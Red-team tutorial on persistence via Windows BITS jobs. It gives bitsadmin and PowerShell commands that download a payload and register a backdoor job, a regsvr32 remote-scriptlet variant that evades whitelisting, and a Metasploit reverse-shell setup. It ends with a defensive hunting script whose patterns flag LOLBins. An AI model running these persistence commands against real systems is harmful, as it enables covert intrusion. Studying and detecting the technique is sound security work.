Windows operating systems ship with various utilities that system administrators use to perform everyday tasks. One of these is the Background Intelligent Transfer Service (BITS), which provides file transfer capability to and from web servers (HTTP) and shared folders (SMB). Microsoft provides a binary called “bitsadmin” as well as PowerShell cmdlets for creating and managing file transfer jobs.

From an offensive point of view this functionality can be abused to download payloads (executable files, PowerShell scripts, scriptlets etc.) onto the compromised host and execute them at a given time in order to establish persistence during a red team operation. However, interacting with “bitsadmin” requires Administrator level privileges. Executing the following command will download a malicious payload from a remote location to a local directory.

bitsadmin /transfer backdoor /download /priority high C:\tmp\pentestlab.exe
Bitsadmin – File Transfer

There is also a PowerShell cmdlet which can perform the same task.

Start-BitsTransfer -Source "" -Destination "C:\tmp\pentestlab.exe"
BitsTransfer – Transfer Files PowerShell

Once the file has been dropped onto disk, persistence can be achieved by executing the following commands with the “bitsadmin” utility. Usage is pretty straightforward:

  1. the create parameter requires a name for the job
  2. the addfile parameter requires the remote location of the file and the local path
  3. the SetNotifyCmdLine parameter sets the command that will be executed
  4. the SetMinRetryDelay parameter defines the time for the callback (in seconds)
  5. the resume parameter will run the BITS job.
bitsadmin /create backdoor
bitsadmin /addfile backdoor ""  "C:\tmp\pentestlab.exe"
bitsadmin /SetNotifyCmdLine backdoor C:\tmp\pentestlab.exe NUL
bitsadmin /SetMinRetryDelay "backdoor" 60
bitsadmin /resume backdoor
Persistence – BITS Jobs

When the job runs on the system the payload will be executed and a Meterpreter session will open, or the communication will be received back at the Command and Control (depending on which C2 is used on the occasion).

Persistence – BITS Jobs Meterpreter

The SetNotifyCmdLine parameter can also be used to execute a scriptlet from a remote location via the regsvr32 utility. The benefit of this method is that it doesn’t touch the disk and can evade application whitelisting products.

bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i: scrobj.dll"
bitsadmin /resume backdoor
BITS Jobs – Regsvr32

The Metasploit framework can be used to serve the payload through the web delivery module.

use exploit/multi/script/web_delivery
set target 3
set payload windows/x64/meterpreter/reverse_tcp
BITS Job – Regsvr32
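From the defender's side, the traits used above (a job with a notification command line, a short retry delay, and a payload written to a temp directory) are exactly what a hunt for BITS persistence should look for. The following PowerShell script is an added example and is not part of the original post; it assumes the BitsTransfer module exposes the NotifyCmdLine, RetryInterval and FileList properties on job objects (Windows 8 / Server 2012 and later) and must run from an elevated prompt to see other users' jobs.

```powershell
# Added hunting example (not from the original post). Enumerates every BITS job on
# the host and reports the ones that carry the persistence traits described above.
# Assumption: job objects expose NotifyCmdLine, RetryInterval and FileList
# (LocalName/RemoteName), as on Windows 8 / Server 2012 and later.
Import-Module BitsTransfer

function Find-SuspiciousBitsJob {
    param(
        # Retry intervals at or below this (seconds) are unusual for ordinary transfers
        [int]$MaxRetrySeconds = 300
    )
    Get-BitsTransfer -AllUsers | ForEach-Object {
        $job = $_
        $reasons = @()
        if ($job.NotifyCmdLine) {
            $reasons += "notify command set: $($job.NotifyCmdLine)"
            # Script hosts and LOLBins in the callback are a strong signal
            if ($job.NotifyCmdLine -match 'regsvr32|mshta|rundll32|powershell|wscript|cscript|cmd\.exe') {
                $reasons += 'notify command invokes a script host or LOLBin'
            }
        }
        if ($job.RetryInterval -gt 0 -and $job.RetryInterval -le $MaxRetrySeconds) {
            $reasons += "short retry interval: $($job.RetryInterval)s"
        }
        $tmpFiles = $job.FileList | Where-Object { $_.LocalName -match '\\(tmp|temp|users\\public)\\' }
        if ($tmpFiles) {
            $reasons += "local path in a temp/public directory: $($tmpFiles[0].LocalName)"
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                JobId   = $job.JobId
                Name    = $job.DisplayName
                Owner   = $job.OwnerAccount
                State   = $job.JobState
                Reasons = $reasons -join '; '
            }
        }
    }
}

# Review the findings before acting; a confirmed job can be cancelled with
# Get-BitsTransfer -AllUsers | Where-Object JobId -eq <id> | Remove-BitsTransfer
Find-SuspiciousBitsJob | Format-List
```

The same information is available from the command line with "bitsadmin /list /allusers /verbose", and the Microsoft-Windows-Bits-Client/Operational event log records job creation and completion for historical review.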

